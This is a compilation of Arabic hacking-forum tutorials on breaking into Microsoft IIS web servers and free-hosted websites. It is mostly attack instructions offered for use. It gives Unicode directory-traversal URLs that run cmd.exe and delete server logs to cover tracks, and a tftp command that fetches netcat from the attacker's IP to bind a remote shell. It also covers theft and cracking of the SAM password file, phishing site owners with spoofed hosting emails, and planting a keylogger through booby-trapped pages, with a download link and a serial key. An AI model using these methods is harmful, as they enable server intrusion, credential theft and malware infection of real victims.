بعد ان يتم تحميل الملف سنشغله عبر تنفيذ هذا الامر

/msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exe
او عن طريق هذا الامر
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+hunter.exe


الآن وقد قاربنا على الانتهاء بقي لدينا في السيرفر عمل واحد فقط الا وهو مسح ملفات اللوج log.* وسيكون ذلك عن طريق هذا الامر :
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.log/s

هناك انواع اخرى من الملفات يتم تخزين فيها بعض المعلومات ويفضل مسحها ايضا وهي مثل الملفات ذات الامتداد tmp
وهذا امر مسحها عبر اليونيكود :
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.tmp/s
ايضا ملحوظه مهمه وهي ان لا تبقى اي معلومات عنك في السيرفر كما يفعل البعض بذكر اسمائهم او ايميلاتهم الحقيقيه قم بمسح اي شيء يدل عليك
او على عملية الاختراق (( حاول ان تصل الى هذا المستوى ))
هناك عدد من الاشياء والافكار لن اتطرق اليها مثل ارسال فايروس ما او امر على ملف bat حتى تتمكن من وضع مشكله كبيره في السيرفر لكي لا يعمل
او ان ترسل فايروس يقوم بمحو جميع ملفات النظام او ان تمرز نفسك لديهم في السيرفر عن طريق برامج التحكم عن بعد و اخفائها بشكل جيد
في المجلدات ذات الملفات الكثير (( مثل system32 )) والكثير الكثير

__________________________________________________ ______________________________
ملحوظات : لن تعمل هذه الثغره في كل الحالات فهناك بعض السيرفرات يقومون بقطع الطريق عليك عن طريق مسح ملف tftp من سيرفراتهم
(( الملف المسؤول عن ذلك موجود في المجلد system32 )) وبعض السيرفرات قامت بعملية الترقيع (( اصدرت ميكروسوفت ترقيعا لهذه الثغره ))
وبعضهم قد يكون واضع فاير وول يقوم بمراقبة الباكيج الصادر والوارد وقد يقوم بعمل اصطياد لمثل هذه العمليات
واخرون يقومون بتركيب برنامج الحمايه القوي جدا في نظم IIS الا وهو Secure IIS من شركة Eeye
والعديد العديد من العقبات ولكن عند كتابة هذا الموضوع (( قبل حوالي اربعة اشهر )) كان ما يقارب 90% من السيرفرات التي فيها نظام IIS
تحوي هذه الثغره وبدون ترقيع (( لعدم وجوده وقتها )) او لأهمال المدير.

انتهى،،،


" الدليل الكامل لإختراق سيرفر IIS "
<منقول من منتديات شبكة الحزم>
<الكاتب: DEMON >
---------
مقدمة : -
---------
يعلم الجميع مدى انتشار سيرفرات IIS حيث تشكل النسبة الاكبر المستخدمة في تشغيل مواقع الانترنت ..
ويعلم الجميع مدى ضعف الناحية الامنية لهذه السيرفرات .. لذا قررت القيام بجمع اشهر ثغرات هذا النوع مع توضيح كيفية عملها .

---------
ملاحظة : -
---------
معظم الطرق الموجودة هنا تعمل على سيرفرات IIS4.0 و IIS5.0 وجميعها تعتمد على البورت 80 ((يعني من خلال المتصفح)) .

-------------
المتطلبات : -
-------------
1- CGI-Scanner جيد .. أنا افضل Whisker (يمكنك تنزيله من هذا الموقع : www.wiretrip.net/rfp )
2- اكتيف بيرل لتشغيل ملفات البيرل ( يمكنك تنزيله من الموقع : http://www.activestate.com/ )
3- ويب سيرفر (اي نوع) اباتشي او IIS ..


#########################
#########################

#########################



###########
#! Game Starts #
###########


----------------
IIS Hack.exe : -
----------------
اكتشف خبراء الامن في شركة eEye ثغرة امنية تسمح لك بتحميل نسخه ذكية من nc.exe وجعلها تنصت على المنفذ 80 ..
وهذا سيعطيك سطر اوامر cmde.exe مع امتيازات Administrator .
بامكانك انزال NC.exe و IIS Hack.exe من الموقع http://www.technotronic.com/ .
ويجب تشغيل ويب سيرفر في جهازك قبل تنفيذ الثغرة ..
قم بنسخ اداة nc.exe وضعها في الدليل الرئيسي للويب سيرفر لديك (في اباتشي Htdocs) وفي IIS الدليل wwwroot .
ثم قم بتشغيل IISHack.exe :
c:\>iishack.exe http://www.target.com/ 80 your_IP/ncx.exe
وبعد اتمام الخطوة السابقة بنجاح :
c:\>nc http://www.target.com/ وستجد امامك eGG SheLL

ملاحظة : تعمل هذه الثغرة على سيرفرات IIS4.0 فقط ((اذا لم يتم تركيب الرقعه)) .

do you want me to explain what to do next, hey common you must be kidding
...hehe....


-----------------
MDAC = RDS :-
-----------------
اعتقد انها ثغرة قديمة قليلا (لكني ما زلت ارى ان 40% من المواقع تعاني منها ..
تسمح لك هذه الثغرة بتشغيل اوامرك على النظام الهدف بشكل محلي .. سيتم تشغيل وامرك بصفتك مستخدم SYSTEM اي بصلاحيات مدير النظام .. على العموم اذا اردت معرفة اذا ما كان النظام مصابا بهذه الثغرة ام لا ..
قم اولا بالاتصال بالنظام الهدف : c:\>nc -nw -w 2 http://www.host.com/ 80 ثم قم بارسال الامر : GET /msadc/msadcs.dll HTTP
فإذا كان الرد : application/x_varg فهذا يعني ان النظام مصاب (( اذا لم يتم ترقيعه )) ..
بامكانك ايجاد سكربتات بيرل تسهل عليك العمل في هذا الموقع : www.wiretrip.net/rfp (( mdac.pl - msadc2.pl )) v
c:\> mdac.pl -h host.com
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c
إذا اردت تغيير الصفحه الرئيسية ما عليك الا تنفيذ الامر : echo hacked by me hehe > C:\inetpub\wwwroot\index.htm
وإذا أردنا احكام السيطرة على الموقع بامكاننا تحميل Hacker's Swiss knife Army اقصد Nc.exe بواسطة هذا الامر :
%systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe
(( قم بقراءة الامر من اليسار الى اليمين لتتمكن من قراءته جيدا ))
بعدها قم بالاتصال بالنظام الهدف على المنفذ 80 وستجد سطر اوامر مع امتيازات Administrator .


--------------------------------------
Codebrws.asp & Showcode.asp :-
--------------------------------------
الملفان عبارة عن قاريء ملفات ASP يأتي مع IIS ولكنه لا يأتي محمل افتراضيا بل يجب على مدير النظام تفعيله ..
فإذا كانت هذه الخدمة مفعلة ستسفيد منها كثيرا قهي تسمح لك بقراءة اي ملف .asp ((اعني رؤية المصدر)) .
باستخدام هذا الامر ستحصل على ملف السام (( اذا كان النظام مصابا )) :
http://www.victim.com/msadc/samples...nt/repair/sam._
بعد الحصول على ملف السام Expand it & Crack it .. باستخدام الاداة المفضلة لدي LC3.0 (سيتم كسرها في اقل من 24 ساعه ) .


--------------
Null.htw : -
------------
عملية شرح كيفية عمل هذه الثغرة معقد قليلا .. لذا سأكتفي فقط بطريقة الاستفادة منها ..
باختصار تسمح لك برؤية السورس كود لاي ملف ASP ..
لتنفيذ الثغرة : http://www.victim.com/null.htw?CiWe...HiliteType=full
سيعرض لك هذا الرابط السورس كود الخاص بالصفحه Default.asp .


----------------------
webhits.dll & .htw : -
----------------------
اولا قم بتجربة اللنك على النظام الهدف : http://www.victim.com/blabla.htw
فإذا كان الرد بهذه العبارة : format of the QUERY_STRING is invalid فهذا يعني ان النظام الهدف مصاب بنسبة 90% .
اخيرا جرب تنفيذ الثغرة بهذه الطريقة :
http://www.victim.com/xxxxxxxxx/xxxx...ilitetype=full
مع تغيير الـ XXXXX/XXXXX/XXXX/XXX.htw باحد هذه الملحقات , وبالتأكيد سيعمل احدها :
iissamples/issamples/oop/qfullhit.htw
iissamples/issamples/oop/qsumrhit.htw
isssamples/exair/search/qfullhit.htw
isssamples/exair/search/qsumrhit.htw
وبالتالي ستحصل على ملف السام قم بكسره بواسطه الاداة LC3 ..


------------------------------------------------
[ASP Alternate Data Streams [::$DATA :-
------------------------------------------------
هذه الثغرة كانت بدايتها منذ العام 1998 .. وهي مخصصة بالتحديد لسيرفرات IIS3.0 والان تعمل على بعض سيرفرات IIS4.0 ..
ومهمتها عرض السورس كود لاي صفحه (( البعض يتساءل مالفائدة من عرض سورس الصفحه ؟؟ )) الاجابة ان بعض الصفحات تحتوي على معلومات مهمة مثل كلمات مرور قواعد البيانات مثل Global.asa
يمكن تنفيذ الثغرة من المتصفح بواسطة هذا الأمر http://www.victim.com/default.asp::$DATA


------------------
ASP dot bug : -
------------------
ربما اقدم ثغرة في هذا النص هي هذه الثغرة حيث تقوم ايضا بعرض السورس كود الخاص بأي صفحه .. حيث تم اكتشافها في العام 1997 ..
ويتم تنفيذها من المتصفح بهذا الشكل :
.http://www.victim.com/sample.asp لاحظ النقطة الموجودة في اخر السطر
وهي فقط تعمل على سيرفرات IIS3.0 .


------------------------------------
ISM.DLL Buffer Truncation : -
------------------------------------
خطأ برمجي يسمح للمهاجم بسحب الملفات ورؤوية السورس كود ايضا ..
وفكرة الثغرة هي التحايل على السيرفر بإيهامه اننا قمنا يطلب ملف ما .. وفي الحقيقة نحن نقوم بطلب ملف اخر ..
الملف المسؤوول عن هذا الخطأ هو ISM.dll حيث يتم تحميله بعدد كبير من الرموز المسافة (%20 ) Space .
يمكن تنفيذ الثغرة بهذا الشكل :
http://www.victim.com/global.asa%20(...<=230)global.asa.htr
مكان الـ 230=> نقوم بوضع 230 مسافة بهذا الشكل 20% ..
هذا الخطأ يعمل على سيرفرات IIS 4.0&5.0 .. ولكن لا يمكن تجربتها على السيرفر اكثر من مره الا اذا قام بتسجيل خروج وتسجيل دخول , ويعود السبب في ذلك ان الثغرة السابقة تؤدي الى ايقاف الملف ISM.dll عن العمل في الذاكرة بينما تطلب الثغرة ان يكون الملف المذكور قيد العمل .. لذا يجب اعادة تحميل الملف في الذاكرة مره اخرى .. اي بمعنى اخر يجب ان يقوم مدير النظام الهدف بعمل اعادة تشغيل Rebot او Logout & Login .


----------
+.htr :-
---------
هذه الثغرة ايضا تقوم بعرض السورس الخاص بملفات ASP .
يمكن استخدامها بهذا الشكل :
http://www.victim.com/global.asa+.htr


-------------
site.csc : -
------------
تمكنك هذه الثغرة من معرفة معلومات مهمة عن الـ DNS الخاص بالموقع بما في ذلك DSN, UID and PASS Database ..
الثغرة : http://www.victim.com/adsamples/config/site.csc
سيقوم المهاجم بانزال الملف المذكور .. وسيحصل على معلومات قيمة و هامة أيضا .
انتهى،،،
__________________
[align=center][glint]لا إله إلا الله محمداً رسول الله[/glint]
[caution]لا إله إلا الله محمداً رسول الله
سبحان الله و بحمده ... سبحان الله العظيم
اللهم قني عذاب جهنم و عذاب القبر و فتنة المحيى و الممات و شر فتنة المسيح الدجال ... آمين [/caution]
[/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]

[email protected]
Syrian Hacker غير متصل  
قديم 16-02-2008, 02:22   #13
:: عضو مميز ::
 
الصورة الرمزية Syrian Hacker
 
تاريخ التسجيل: Feb 2008
الدولة: System32\Config\SAM
المشاركات: 112
"دراسة مفصلة وبعمق في الـUniCode"
<منقول من منتدى إعصار>
<الكاتب: Dark Devil>
السلام عليكم ورحمه الله و بركاته ::
ازيكم شباب ايه اخباركم كلكم ؟ اتمنى تكونوا بخيرو.
اعذرونى على غيبتى و انقطاعى عنكم و لكن و الله ظروف رهيبه
و الان خلونا نرغى فى شويه كلام فاضى على رأى بروكن
كنت اتصفح الانترنت و ادعبث شوى و بعدين جمعت بعض من المعلومات من ملفات مختلفه و هى تتحدث عن اليونى كود (طبعا الان معظمكم سيستعجل و يقول ياه ه ه ه ه يونى كود قديمه ....الخ ) و لكن انا اقوله اصبر لقد ذكرت اليونى كود فى المنتديات ثلاث مرات مره عن الصديق بلاك هنتر و مره من الاخ هكس و مره عن الصديق ديمون او ابو خلود لكن هذه المره صدقونى ستكون مختلفه تمام الاختلاف عن المرات السابقه (Trust Me )
و الان دعونا من ها الخرابيط و خلونا نقول الدرس يمكن يعجبكم::

اولا:
====
متى وجدت اليونى كود؟
Found On 15 May 2001 BY NSFOCUS

السيستيمز التى تتأثر بالثغره هى ::
All running IIS 4 / IIS 5 web server
Windows 2k
Windows 2k SP1 + SP2

ثغره اليونى كود ::هى عباره عن ثغره تسمح للهاكر بأن يشغل اوامر بالقوه بصلاحيه مسموح بها (اى يكون له امتياز IUSR_machinename account )

و تحدث هذه الثغره اصلا نتيجه ان روتين ال cgi الموجود على الويب سرفر نفسه يفك شفره عنوان الموقع مرتين و هذا ما نسميه بال DeCode (لا تقلق ستفهم بعد ذلك )

تعالى معى خلينى اوضحلك ايه الخرابيط الى انا كاتبها فوق دى

و ليكن مثلا ::
http://iisserver/scripts/..%5c..%...md.exe?/c+dir+c ===> ثغره يونى كود

http://iisserver/ ====> سيكون هذا هو هدفنا اى الموقع المصاب بالثغره المذكروه

* /scripts/ - و هذا الفولدر لديه امتيازات تنفيذيه على السرفر (اى يمكن لليوزر تنفيذ اى امر على الوب سرفر من خلاله ) وهذا الفولدر ايضا هو المستخدم فى تنفيذ سكربتس ال cgi الموجوده على الوب سرفر و بالتحديد هذا الفولدر يسمى الفولدر التنفيذى اى executable directory )

و طبعا هذا الفولدر ليس له اسم ثابت هذا فقط مثال و لكن يمكن ان يكون له اسماء كثيره على الملقم iis و ملحوظه هامه:: لا يوجد على كل ملقم iis هذا الفولدرالتنفيذى اى executable directory

و اعتقد ان الصديق بلاك هنتر و الاخ هكس قد ذكرو معظم اسامى هذه الديريكتورز فى شرحهم (فأنا اريد ان اربط الدروس مع بعض حتى تكون سلسله متكامله )

* winnt/system32/cmd.exe ===> و طبعا هذا هو ال cmd الذى يسمح لنا بأدراج سطور الاوامر التى نريد تنفيذها (و على فكره ممكن تستعمل هذا ال cmd فى استخدام اوامر مثل ping و netstat و traceroute ....الخ اعتقد انها فكره لم يلاحظها بعضنا )

* ؟- علامه الاستفهام تخيلو حتى علامه الاستفهام فى هذه الثغره لها دور فهذه العلامه تعنى الحاله التى ينفذ بها الامر (طبعا مش فاهم يعنى ايه ) و لا يهمك تعالى معى افهمك يعنى ايه علامه الاستفهام تعنى كلمه argument و هذه الكلمه هى التى تعنى الحاله التى سينفذ بها الامر اى انه امر مثلا ينفذ فى لحظه ثم ينتهى مثل copy مثلا ام انه امر مثلا ينفذ و لكن يستمر مفعوله و حقيقه ان طبعا معظم الاوامر التى نستخدمها هى الاوامر العاديه و هى من نوع argument /c و هذا ال /c يعنى ان الامر ينفذ فى لحظه ثم ينتهى
تعالى افهمك اكثر :: لو عندك ويندوز 2000 افتح ال cmd بتاعك و اكتب هذا (cmd /?) و اضغط انتر ,سيظهر لك كلام كثير جداا و لكنى اخترت منه جزء بسيط فقط للتوضيح و انت عليك الباقى
شوف ايه الى راح يظهر لك ::
Starts a new instance of the Windows 2000 command interpreter

CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
[[/S] [/C | /K] string]
/C Carries out the command specified by string and then terminates
/K Carries out the command specified by string but remains
/S Modifies the treatment of string after /C or /K (see below)
/Q Turns echo off
/D Disable execution of AutoRun commands from registry (see below)

هذا جزء بسيط جداا مما راح يظهر لك و لكن تعالى نشوف هذا الجزء ايه معناه اولا يقولك ::
Starts a new instance of the Windows 2000 command interpreter و هذه الجمله تعنى بالعربيه بدايه حاله جديده من مترجم ال ويندوز 2000 و هذا طبعا وضح لنا ان كل cmd يمكن ان يتخكم صاحبه فى حالته حسب ما يفتح او يغلق الarguments . و بعدها يظهر لنا arguments كثيره و منها الذى نستعمله دائما فى الثغره و هو /c شوفو كده ما المكتوب امامه ::
Carries out the command specified by string and then terminates و هذا الكلام معناه انه ينفذ الامر الموجود فى سطر الاوامر ثم ينتهى و طبعا هذا للاوامر العاديه التى نعرفها
تعالو نشوف السطر الى تحتيه ::سوف نجد انه يتكلم عن argument لا نراه فى ثغره اليونى كود و هو ال /k شوفو ايه مكتوب امامه::
Carries out the command specified by string but remains و طبعا معناه انه ينفذ الاوامر الموجوده فى السطر و لكن يستمر مفعولها (ما زلت ابحث عن اوامر مثل هذه و لكن هذا ما هو مكتوب امامى و لكن تقدر تقول انها الاوامر التى تأخذ فتره طويله حبتين مثل ping مثلا )
و مثلا هناك argument أخر مثل /Q و هذا نستخدمه فى اغلاق تفعيل امر echo كما هو واضح فى المثال فوق
و هناك الكثير من هذه ال arguments و طبعا منها ما هو اساسى لا يمكنك التحكم فيه (يعنى فتحه او غلقه مثل ال /c و ال /k ) و هناك اخرين يمكنك ان تجعلهم on او off و بهذا تكون انت تتحكم بحاله ال cmd خاصتك (ياريت تنفذ الامر و تقرأ المكتوب لانك راح تلاقى تفاصيل الفتح و الغلق بالتفصيل ) و اصبروا على قليلا حتى انتهى من الامتحان الاول فى MCSE فى خلال اسبوعين ان شاء الله تعالى و بعد ذلك نعود اكثر قوه و نشرح لكم هذه النقطه بالتفصيل ان شاء الله بس اصبرو شوى
اعتقد انك الان فهمت ما هى ال arguments و ما فائده /c التى تكتبها فى الثغره و انا متأكد انك لا تعرف معناها .
تعالو نروح لنقطه سهله و بسيطه جدااا فى الثغره ,انت تشغل ال cmd.exe لانك تريد ان تتحكم بالموقع و تغير الاندكس و الخ و و لكن تعالى مثلا نشغل اى ملف تانى ياترى كيف نشغله ؟
انا راح اقلك كيف ::كل ما عليك فعله هو ان تقوم بوضع اسم الفايل الذى تريد تشغيله بهذا الشكل Ping.exe+PRINT بلا من cmd.exe?/c و بهذا تكون قد شغلت الفايل الذى تريده
(enjoy this ) .حيث تصبح الثغره بهذا الشكل ::
http://issserver/scripts/..%5c..%.../ping.exe+PRINT

* /c+ - و بالتالى كما عرفنا فوق انا /c هى ال argument للcmd.exe او الحاله التى سينفذ عليها ال cmd الامر اما علامه ال + التى بجانب ال /c فهى بمقام المسافه بين الكلمتين فى الثغره و لكن لا يمكننا اسبدالها بمسافه عاديه و بعدها يكون الامر الذى يحمله سطر الاوامر لينفده ثم علامه + ثانيه و بعدها اسم الدرايف الذى تعرض محتوياته على الشاشه حاليا .

**و نأتى الان لاهم نقطه فى الثغره و هى اساسا سبب الثغره كما ذكرنا فى اول الكلام (هو ان سبب الثغره يكون حل شفره العنوان اكثر من مره )و هذا ما نطلق عليه الdecode و انا شخصيا افصل الديكودز على انه تحليل حتى نصل لابسط الحل كما فى الرياضيات يعنى simplyfiey اى تبسيط و فك المعادله تعالو خلينا نفهمكم هذا على الثغره نفسها ::

/..%255c..%255c هذا هو الديكود اى التحليل للاصل /....
ولكن ما الذى نحاول ان نفعله بهذه التحليلات الغريبه ؟
فنحن بذلك نحاول ان نحسن و نلعب فى مسارات الديريكتورز و لكن للاسف لا يمكنك تغيير او اللعب فى الديريكتورز لان ال iis مزود بخاصيه عمل check على مثل هذه الديكودز و منعها من التنفيذ و هنا يقع اصل ثغره اليونى كود و هو التحليل لمرتين او لاكثر من مره فهمتم قصدى الان اى ان الiis مزود فعلا بخاصيه ال check على هذه الديكودز و لكن انت تضع الثغره و بها اكثر من تحليل واحد لنفس اسم الموقع و لذلك يقوم ال iis بوظيفته المعتاده و هى ال check و المنع على الديكود الاول و يظهر له ان كل شئ بخير و انه يسيطر على الموقف خخخخخخخخ و لكن الحقسقه انه يعمل الcheck مره واحده فتكون النتيجه ان الديكود الثانى ينجح تماما فى محاوله اللعب فى الديريكتورز و بالتالى يكون نتيجه الديكود الثانى هو ان يرجع الى اصله اى / (slash )

و تعالو ندخل و نتعمق اكثر فى تفاصيل الديكود للثغره بعد ان عرفنا فكرتها ::
شوفو فيه ماده اسمها computer logic و الماده دى راح درس فيها شئ يسمى HexaDecimal Values و هذه ال values هى اساس الديكود الذى نفعله فى الثغره اى ان كل حرف صحيح او حركه مثل / فى الكمبيوتر لها ما يسمى بال hex value تعالى اوضحلك اكثر ::
مثلا: %20 تعنى مسافه (space)
هذا مثال بسيط و اعتقد انك فهمت الان كلامى و طبعا يوجد جدول لهذه ال hex values المساويه للحروف و الحركات العاديه فى الكمبيوتر , اذن اعتقد انك ادركت تماما الان انك ترسل hex values عوضا عن الحروف و الحركات العاديه الى السرفر و هذا بالضبط ما نسميه التحليل او فك الشفره او الdecode

تعالى نخش فى تفاصيل الثغره اكثر و سنأخذ الحركه التى نشرح عليها هى ال / (slash ) حيث انها من اساسيات الديكود فى هذه الثغره ::
شوف فى جدول ال hex value راح نجد ان ال / = %5c , طبعا هذا هو الديكود الاول الذى ستفكر الان فى انك تحذف ال / و تضع بدلا منها هذا الvalue فتنجح الثغره و لكن انا اقول لك هذا خطأ لان هذا هو الديقود الاول و انا ذكرت ان الديكود يحدث مرتين او ممكن اكثر يعنى لو وضعت هذا الديكود الاول فستجد ان ال iis لديه القدره على ان يمسك هذا الديكود و يمكنعه من التنفيذ و لذلك علينا ان نحلل هذا ال value حتى يتم الديكود التانى فتنجح الثغره

و بالنظر الى جدول ال hexadecimal values شوف نجد هذا ::
% = %25
5 = %35
c = %63

و بالتالى نجد انفسنا قد خدعنا ال iis checker بأننا حللنا ال شفره مرتين و بالتالى فسنحصل فى المقابل على الاصل و هو / و بالتالى تكون قد نجحت الثغره .

فهمتم الان شباب معنى ديكود العنوان مرتين و فهمتم اساس الثغره و الديكود مرتين ليس معناه تكرار التحليل الاول مرتين و لكن معناه تحليل و فك التحليل الاول اى simplify الى ابسط و اطول صوره ممكنه فى نفس الوقت

و عشان توضح اكثر معك راح احطلك كيف التركيبه الصح للتحليل ::
%255c %25 = % 5 = 5 c = c = %5c
%%35c % = % %35 = 5 c = c = %5c
%%35%63 % = % %35 = 5 %63 = c = %5c
%25%35%63 %25 = % %35 = 5 %63 = c = %5c

ثم : %5c =/

ارائيتم التحليل طبعا فى الاخر يجب ان يساوى الديكود الاصل و هو كما واضح فى مثالنا كل التحليلات تساوى %5c و كما ذكرنا %5c = / و لكننا حللنا هذا الرمز الى اطول و ابسط تحليل حتى نخدع ال iis checker .
و فى النهايه بعد فهمنا للثغره و اساسها هيا تعالو نطبقها مع بعض
سوف نضع الثغره فى هذا الشكل ::
http://iisserver/scripts/..%5c..%...xe?/c+dir+c:+/s

و ستدخلون على الموقع بنجاح و لكن اكيد تلاحظون شئ جديد قد زاد على الثغره و هذا الشى هو +/s
هذا الرمز
و عندما تدمج هذا الرمز مع الثغره كما فى المثال السابق سوف تأتيك لسته بكل فايل كبير و صغير فى كمبيوتر الويب سرفر

و الله تعبت فى هذا الدرس و تعبت فى قرائه المعلومات و تجميعها عن اليونى كود حتى اصل لهذا الشكل الاخوه و ان شاء الله انتظرو موضوعى القادم بعدما اكون انهيت امتحانى الاول فى MCSE (ادعولى بالنجاح ) و سيكون عباره عن تلخيص للتعامل مع شبكات ويندوز 2000 و كيفيه اختراقها و فائده ال WIN2000 RESOURCE KIT.
انتهى،،،

" تدريب على عملية الإختراق بواسطة اليونيكود "
<الكاتب: ماكس هاك >
بسم الله الرحمن الرحيم..
كثر الكلام عن إختراق المواقع بأنواعه واليوم عندي شرح عن الإختراق عن طريق اليونيكود أو بالأصح تطبيق عملي على كيفية الإختراق عن طريق اليونيكود وهذا النوع يعتبر للمبتدئين وهو الذي بإذن الله سيوصلهم إلى طريق الإحتراف .....
******************
بسم الله نبدأ...
سيكون التطبيق على جهازك وهو مثل الموقع أو السيرفر وتقوم بتطبيق الدرس كما وأنك على موقع مصاب.....

لكي تتدرب على إختراق المواقع قم بتركيب نظام ويندوز2000 على جهازك . وفي نفس السيدي تبع النظام تقوم بإضافة سيرفر IIS وذلك عن طريق :
1* قم بالذهاب إلى لوحة التحكم.
2* قم بالنقر على إضافة إزالة برامج.
3* قم بالنقر على زر " إضافة إزالة مكونات ويندوز ".
4* قم بوضع علامة صح على الخيار الأول “IIS”.
هذا بالنسبة لكيفية تنزيل السيرفر..
اما عن كيفية التدرب على الجهاز أي اختراقه فقم بالتالي:ـ
قم بوضع الموقع في مجلد wwwrootالموجود داخل مجلد Inetpub طبعا هتدخل عليه بعد ما تشغل السيرفر IIS عن طريق
http://127.0.01/
ولإيجاد الثغرة في الجهاز والتدرب عليها قم بتشغيل برنامج عمران سكان أو أي برنامج اخر للفحص عن الثغرات تبع اليونيكود وقم بوضع العنوان تبعك الي هو http://127.0.0.1/
وقم بتطبيق المهارات التي تعلمتها في اختراق المواقع المصابة باليونيكود.
انتهى،،،








" شرح مفصل لكيفية اختراق المواقع المجانية "
<منقول من منتدى إعصار>
<الكاتب: De\/iL Ni9hT>
-=سهوله اختراق المواقع المجانيه=-

نعم,,,ان اختراقها اسهل مماتتصور

الاساسيات لاختراق كل شي هو الكوكيز لانه يحتوي على جميع المعلومات((الموقع,,ايميل,,الخ))

ولكن يجب ان تعرف عده نقاط مهمه لاختراق اي موقع مجاني

اولا=-

يجب عليك معرفه نوعيه اصدار المتصفح

ثانيا=-

عليك معرفه بعض بيانات صاحب الموقع مثل الايميل..الخ وتستطيع التوصل له ببعض الطرق=-

ثالثا=-

عليك اولا ايجاد الاكواد الازمه لسرقه الكوكيز من المتصفح=-



لنــبدأ الشرح

النقطه الاولى لمعرفه نوعيه اصدار المتصفح لصاحب الموقع سهله جدا فكل موقع يصمم على حسب نوعيه المتصفح الخاص بصاحبه ويكت لنا في نهايه الموقع يفضل تصفحه بدقه معينه ويعطيك اصدار الاكسبلور المناسب لتصفح الموقع=المناسب لتصميمه=نفس الاصدار الخاص بهوهذه اسهل نقطه واهم شئ فيها لاختراق المواقع المجانيه

واما بالنسبه للوصول الى الضحيه فهناك عده طرق ويجب ان يكون معاك اكواد الهتمل الخاصه بسرقه الكوكيز((ساضعها هنا لاحقا))والان بعدما حصلت على هذه الاكواد تضعها في صفحه وتحاول جذب الضحيه للتوجه لها وهناك عده طرق

1-تاخذ عنوان ماسنجر او ايميله من اي مكان في الموقع اذا وضعه وتحبه وتصير موثوق عنده((هههههههه حب مصلحه))وتعطيه صفحتك الى حطيت فيها الكوكيز او ترسل له ملف سارق الباسوورد

2-مثلا تحدد نوعيه الشركه الى مقدمه الاستضافه المجانيه للموقع فمثلا اذا كان عنوان الموقع http://www.name.8m.com/

فهذا معناه ان الموقع مقدم من شركه فري سيرفر FreeServerSوتستطيع معرفه النطاق المحدده بالدخول الى المواقع المجانيه وعمل تسجيل وستظهر لك انواع الدوامين المتاحه((8m.s5....الخ

وتسجل عندهم وسيرسلون لك البيانات ويكون لهم تصميم خاص جدا وانت عليك بسرقه نفس التصميم وتغيير محتوى الرساله((طبعا بالعنقليزي))وارسال رساله منه تتطلب منه فتح موقع((موقعك الى فيه الكود))مثلا لعمل التحديثات اواي شئ اخروهو لن يشك اذا رأى تصميم رسالتك وطريقتك نفس طريقه موقع الشركه وسيفتح الموقع حالا

واذا لم يضع ايميله فهناك طريقه وهى انك مثلا تدخل سجل الزوار عندهوتكتب شي يقهره و يجذبه بقوه يعني مثلا تقول له تصميم موقعك مسروق حرفيا من هذا الموقع وتعطيه اللنك((وهو للمره المليون اقلكم الموقع الى فيه الكود))او اي طريقه اخرى من ذكائكواذا لم تجد ايميله او سجل زوار فهناك عليك اختراق الموقع بالثغرات وهو صعب جدا جدا

النقطه الثالثه وهي الكوكيز=-

يطول شرحها عشان كدا بحط شرحه في موضوع تاني مرفق معاه الاكواد الخاصه بالمتصفحات مع طريقه التعامل معها لسرقه كوكيز الضحيه وتوصيله الى جهازك



طريقه اختراق المواقع المجانيه التى اصحابها لديهم متصفحIE 5 IE 5.5



هذه هي الطريقه التى تستعملها اذا استطعت الوصول الى صاحب الموقع ((راجع درس "سهوله اختراق المواقع المجانيه"))

اولا لن نعتمد على الكوكيز في سرقه الباسوورد وسنعتمد على تروجان قوي وخطير يسجل كل شي في الكيبوردولايكشفه النورتون انتي فايروس وهو الذي سنضعه في صفحه ملغومه اول مايفتحها الضحيه ينزل الى جهازه,,,,

اولا قم بتحميل برنامج keykey2000وهذا البرنامج يسجل كل شي بالكيبورد والاشياء الى كنت تعمل بها ويرسلها على الايميل وانا مجربه ولايستطيع النورتون الجديد والازرار الثلاثه لالغاء العمليات النشطه في النظام ايقافه ووصلته

http://www.mikkotech.com/kk2000pro.exe

والسيريال نمبر

SN: K100-43-109-0-793218E876A4C9-29

والبرنامج سهل جدا ولا يحتاج لشرح واذا اردتم شرحه كلمونيوالان بعدما جهزت ملف الباتش بهذا البرنامج قم بتحميل برنامجgodwillوهو البرنامج الخاص لالغام الموقع على انترنت اكسبلور5 و 5.5((هذه هي سر المهنه))ووصلته

http://www.thecorpz.org/activex/gwpackage.zip



====================الشــــرح=====================




انا لن اقوم بعمل شرح بالصور وهذا شرح بسيط للبرنامج لانه سهل جدا

عندما تفتح البرنامج ستظهر لك لوحه اختار منها

enterفي الاسفل وستظهر لك القائمه والذى يهمنا منها

Upxوهذا لتشفير الباتش((اظننا خرجنا عن موضوعنا))

Htmlوكل شغلنا هنا لكي نقوم بعمل صفحه ملغومه وعندما نضغط عليه تجي عده اختيارات وانت اختار منها

General optionsوستظهر لك مربع عرض الصفحات الملغومه وهذا شرح سريع لها

enter exe fileومن هنا تضع الباتش الى سويته بشرط الا يكون حجمه كبير جدا((هل تفيدنا هذه المعلومه في شئ))

enter htmlلاستعراض صفحه من جهازك ثم الغامها وحط علامه صح جانب use default pageليقوم البرنامج بعمل صفحه جديده

وفي الاسفلHTA File Nameوهنا تضع اسم الصفحه وبعد الانتهاء من ذلك نختار كلمه Doneليقوم البرنامج بعمل الصفحه((وسيكون مكانها في نفس مجلد البرنامج))







وارجو ان يكون الشرح واضحا

واذا واجهت مشكله مع البرنامج توجه الى هذا الموقع

http://www.thecorpz.org/html/activesploits.html

===================نهايه الشـــرح====================



وبعدما تقوم بوضع الصفحه الملغومه في النت واعطائها للضحيه بالطرق التى شرحتها سابقا سينزل التروجان على جهازهعندما يقوم بفتح موقعك الملغوم ولم يبقى لك الان انت تنتظر في بريدك الى حطيته في التروجان المعلومات عن الضحيه مثل((الموقع والايميل,,الخ))وهذه الطريقه تنفع ايضا لسرقه الاشتراكات واساميه في المنتديات وايميله.
انتهى،،،



